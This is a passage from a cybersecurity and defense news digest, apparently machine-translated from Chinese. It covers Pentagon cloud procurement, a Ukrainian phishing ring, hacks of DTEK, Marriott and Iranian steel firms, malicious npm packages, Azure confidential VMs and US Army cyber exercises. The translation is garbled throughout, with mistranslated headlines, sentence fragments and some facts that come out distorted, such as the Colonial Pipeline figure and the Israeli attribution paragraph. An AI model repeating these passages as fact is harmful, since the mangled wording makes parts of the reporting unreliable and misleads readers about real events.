reported on July 7 that the Pentagon’s internal watchdog is looking to support cloud capabilities for sensitive workloads as the organization moves its computing infrastructure to managed services, according to contract documents released on July 5 by the Department of Defense Office of the Inspector General. (OIG) expects cloud services to host Department of Defense Impact Level 5 workloads, the most sensitive level of unclassified information.
Currently, the OIG is conducting a market survey and is looking to obtain IL5 authorization by July 19. Responses from vendors. The agency said it will review and respond to questions from vendors who will be included in the phased migration to the cloud and plans to do so by July 12. workloads running in hybrid cloud environments. As part of the request for information, OIG wants to hear from vendors about how to isolate their information from other customers in multi-tenant environments. In addition, OIG wants to know if the vendors are qualified. Has a position on government-wide procurement tools, including the General Services Administration's various schedule and contracting tools.
The U.S. Army successfully migrated Materiel Command applications to the CARMY Cloud
Reported on July 7, the U.S. Army’s Program Executive Officer for Enterprise Information Systems (PEO EIS)’s Acquisition, Logistics, and Technology Enterprise Systems and Services (ALTESS) Product Office is Enterprise Services Part of the product portfolio, in partnership with several other Army organizations, successfully completed the migration of 45 Army Materiel Command (AMC) applications from Defense Information Systems Agency (DISA) milCloud® 2.0 to Enterprise Cloud Management in May 2022 Agency (ECMA) cARMY Cloud.
4. Cyber Attack and Defense Dynamics
Ukrainian police disrupted multi-million dollar phishing ring
On June 30, Ukraine’s “cyber police” arrested nine members of a suspected prolific phishing ring that lured locals to obtain 100 million hryvnia ($3.4 million) in EU financial support.
Digital experts worked together with officials from the Pechersk Police Department and experts from the National Bank of Ukraine (NBU) to solve the case.
The nine men are accused of setting up and operating more than 400 phishing websites that asked victims to enter their bank account and card details in order to apply for social welfare payments from the EU. Once they receive the data, the gang uses it to hijack users' accounts and transfer their funds.
Russian hacker group invaded Ukrainian energy company
html reported on July 4 that a Russian-speaking hacker group XakNet recently claimed that it had invaded the network of Ukrainian energy company DTEK and published a screenshot of DTEK data on the "Telegram" channel as evidence. .
DTEK, which has thermal power plants across Ukraine, said the goal of the hackers was to disrupt the technical processes of its distribution and generation companies, spread negative information about the company's operations and leave Ukrainian consumers without electricity. Available. DTEK specifically pointed out that when it suffered a cyber attack, the Russian army was shelling one of the company's thermal power plants in Kryvyi Rih, central Ukraine, so the cyber attack may be part of the Russian offensive.
The international hacker organization "Anonymous" retaliated by invading the Russian space agency
reported on July 4 that Spid3r, a branch of the international hacker organization "Anonymous", stated that in retaliation for the Russian hacker organization Killnet's cyber attacks on the governments of Lithuania and Norway, The group invaded Russia's main space exploration agency, the Institute of Space Research of the Russian Academy of Sciences (IKI RAN).
Spid3r said it would soon publish the data it stole. If true, it would be another cyber attack targeting the Russian aerospace industry in recent months. Previously, hackers claimed to have invaded the Russian space agency Roscosmos and leaked documents related to the ExoMars joint Mars exploration mission between the European Space Agency (ESA) and Russia.
Irish regulatory report warns of Russian cyber threats to love
It was reported on July 3 that Irish High Court Judge Charles Meenan recently submitted a report on government communications monitoring, which stated that Russia’s deployment of troops to Ukraine has greatly increased the number of threats to Ireland. National security threats faced in areas such as cyberspace.
The report is not public, but Meenan said that he carefully examined the communications monitored by the police and the army as of June 27, 2022, and found that some individuals and groups inside and outside Ireland pose an extraordinary threat to Ireland’s national security. Serious threats, including the cyber threat posed by Russia. Some cybersecurity experts commented that Russia could use its cyber capabilities to launch large-scale cyber attacks on Ireland to paralyze public infrastructure or steal sensitive intellectual property and personal data.
Software Supply Chain Attack Thousands of Applications
reported on July 6 that security researchers have discovered a major new software supply chain attack that affects thousands of applications and websites involving the use of malicious npm packages.
ReversingLabs discovered more than two dozen npm modules dating back six months. They contain obfuscated Javascript designed to steal form data from the application they are deployed to.The attackers appear to be using pharming techniques to trick developers into downloading their malware packages.
APT hacker group continues to attack military targets in Bangladesh
html reported on July 6 that the Advanced Persistent Threat (APT) named "Bitter" continued to conduct cyber attacks on military entities in Bangladesh.
The news comes from SecuInfra, a team of cybersecurity experts, who issued an advisory on Tuesday describing recent activity by South Asian APTs.
"Through malicious document files and intermediate malware stages, threat actors conduct espionage by deploying remote access Trojans," the document reads.
SecuInfra's findings build on a Talos report released last May that revealed the group's expansion and intent to target government organizations in Bangladesh, and cover a possible attack in mid-May 2022 .
Marriott hit by new data breach and failed extortion attempt
Reported on July 6, hotel giant Marriott International confirmed that it was hit by another after an unknown threat actor vandalized one of its properties and stole 20GB of files. A data breach attack.
The attackers were only able to compromise one of the chain's properties, the BWI Airport Marriott, and had limited access to its network.
"This incident only involved one property. The threat actor did not have access to Marriott's core network. Use of one device at the involved property only lasted approximately six hours," a Marriott spokesperson told BleepingComputer.
"Threat actors used social engineering to trick an employee at a Marriott hotel into giving them access to the employee's computer. The threat actors did not impersonate any Marriott vendors.
Russian information operation focused on dividing the West that supports Ukraine The alliance
reported on July 7 that Russian intelligence services have been using state-controlled media and other disinformation channels to spread propaganda aimed at dividing the Western alliance that supports Ukraine, according to a report released by cybersecurity firm Recorded Future.
Recorded Future found many open source propaganda. Closely related to what the company describes as an "unsubstantiated analytical note" by Russia's Federal Security Service (FSB) Fifth Directorate, Ukraine's security service reportedly intercepted and released the document in June, the report said. The analysis report recommends targeting the "European Community", which contains information about how support for Ukraine and the large number of Ukrainian refugees will lead to a "deterioration of living standards" within the EU. Experts say that this influence operation is consistent with recent Russian practices.
Hackers released nearly 20GB of top-secret files from Iranian steel manufacturing companies
reported on July 7 that the hacker group Predatory Sparrow, which attacked three Iranian steel manufacturing companies on June 27, released nearly 20GB of so-called top-secret data on July 7, local time, including company documents, which reveal the facilities' affiliation with Iran's powerful Islamic Revolutionary Guard Corps. In a series of tweets in English and Farsi, the group calling itself Gonjeshke Darande, or Predatory Sparrow, said the 19.76GB document was only about to be released. "Part One." The group also posted an image of what appears to be an interior view of the steel facility.
The report said Israeli military journalists were regularly briefed informally by senior Israeli officials who suggested that Israel was directly responsible for the attack. In retaliation for the suspected cyberattacks in which rocket sirens were heard in Jerusalem and Eilat last week, Bennett was asked about his approach to cyberattacks as prime minister and gave a lengthy and thoughtful response, according to Israel. The Times reports that Israeli Defense Minister Benny Gantz has ordered an investigation into recent media leaks that "imply" that Israeli military intelligence was responsible for attacks on steel facilities.
5. Cryptotechnology and equipment development
Microsoft Azure now has confidential virtual machines with temporary storage
Reported on July 5, Microsoft has expanded its confidential computing products and now allows Azure cloud computing service customers to use temporary OS disks to create hardware-isolated virtual machines. (Also known as Confidential VM).
With this new public preview feature, Azure customers can only create temporary OS disks on local VM storage (either in the VM cache or on the VM ephemeral disk), ensuring that the data remains 100% confidential as it is never sent to the remote Azure Storage.
"Ephemeral OS disks are suitable for stateless workloads where the application can tolerate a single VM failure but is more affected by VM deployment time or re-imaging of a single VM instance," Microsoft explains.
"With ephemeral OS disks, you can reduce read/write latency to OS disks and speed up VM re-imaging.
This enables customers to benefit from Azure's hardware-based Trusted Execution Environment (TEE), which allows them to access VMs from external Protect its data while processing.
Code outside the TEE environment cannot access or tamper with the data in the TEE because they are designed to enforce only authorized code.
Microsoft says Marketplace, custom images, and Azure Compute Libraries (formerly Shared) Image library) support for ephemeral disks.
Other key features include fast reset or reimage of VM and scale set instances to their original startup state, lower latency (similar to ephemeral disks), and
stateless application support. are free, and like Persistent OS Disks, they are also available in all Azure regions (Public Preview for Confidential VMs)
However, unlike Persistent Disks, they are not available when resized, redeployed, repaired, live migrated, or OS disk data is not retained when the virtual machine is restarted
Azure customers who decide to use confidential VMs with temporary OS disks should be aware that they also come with a set of unsupported features, including capturing VM images, disk snapshots, Azure Disk Encryption, Azure Backup, Azure Site Recovery, and OS Disk Swapping.
"As part of our commitment to providing the best value for Azure confidential computing, we are announcing support for creating confidential VMs using ephemeral OS disks," the Azure team announced on Tuesday. “This enables customers using stateless workloads to benefit from a Trusted Execution Environment (TEE). A trusted execution environment protects the data being processed from access outside the trusted execution environment.
6. Network combat training trends
Army live-fire exercises help improve the upcoming tactical network equipment
reported on July 1, Aberdeen Proving Ground, Maryland - the first phase of the Army's European combat demonstration on its tactical communications Continuing incremental construction of the network has received critical feedback.
Soldiers from 3rd Squadron, 2nd Cavalry Regiment recently conducted a live-fire event in Germany where they tested upcoming equipment. The Army has adopted a multi-year strategy that includes progressively developing and delivering new capabilities to its integrated tactical network, including a combination of program systems of record and commercial off-the-shelf tools. These "capability sets" now deliver technology to units every two years, with each year building on previous deliveries. Capability Set 21 is primarily designed for infantry brigades; Capability Set 23 focuses on Stryker brigades, and Capability Set 25 focuses on armored brigades.
The U.S. Army held the "Cyber Influence" exercise
reported on July 3 that the U.S. Army's 46th Task Force held the "Cyber Influence 2022" exercise in Buffalo, New York, from March 8 to 10, 2022.
The exercise was hosted by 12 units from the Army National Guard and other forces. In addition to the troops, participants also included the National All-Domain Warfare Center (NADWC), including police, emergency response units, environmental protection agencies, power companies and Government and industry leaders at the local, state and federal levels, including the Royal Canadian Mounted Police, mainly U.S.-Canada border security personnel. The three-day exercise is designed to help partners in the Homeland Defense (HD) domain, Total Hazard Domain, Defense Support to Civil Authorities (DSCA) domain and Chemical, Biological, Radiological and Nuclear (CBRN) domain to strengthen cooperation and familiarize themselves with networks impact of attacks to prepare for disaster response and consequence management. An academic lecture was held on the first day of the exercise, a tabletop training exercise and a red team maneuver exercise were held on the second day, and a communications exercise and inspection of regional critical infrastructure such as the New York Power Authority were held on the third day.
David Hayes, assistant chief of staff for communications of the Michigan National Guard's 46th Military Police Command (MPC), said that this exercise tested the United States' resilience, strengthened the combat readiness and cooperation of the partners, and improved the joint efforts of all parties. effectiveness in protecting national security.
Cyber Yankee exercise hones New England Guard skills to counter digital threats
reported on July 6 that National Guard troops from across New England worked with other military services and the private sector to practice defending against cyber attacks and dealing with their consequences.
The annual Cyber Yankee exercise, held June 5-18 at Camp Nett, Conn., provided participants with valuable insights and tactical experience that can now be applied in the real world to critical infrastructure and businesses, according to Guard officials. Digital attacks are increasingly common.
Cyberattacks on U.S. critical infrastructure are increasing. A 2021 ransomware attack compromised the information and controls of companies including JBS, the world's largest meat producer, and the Colonial Pipeline, which transports refined products from Texas to New Jersey and provides less than Half of East Coast Fuel. In March, Connecticut's Bradley International Airport was hit by a distributed denial-of-service attack aimed at taking its website offline.
END
Shared from: Information Security and Communications Security Magazine Public Account
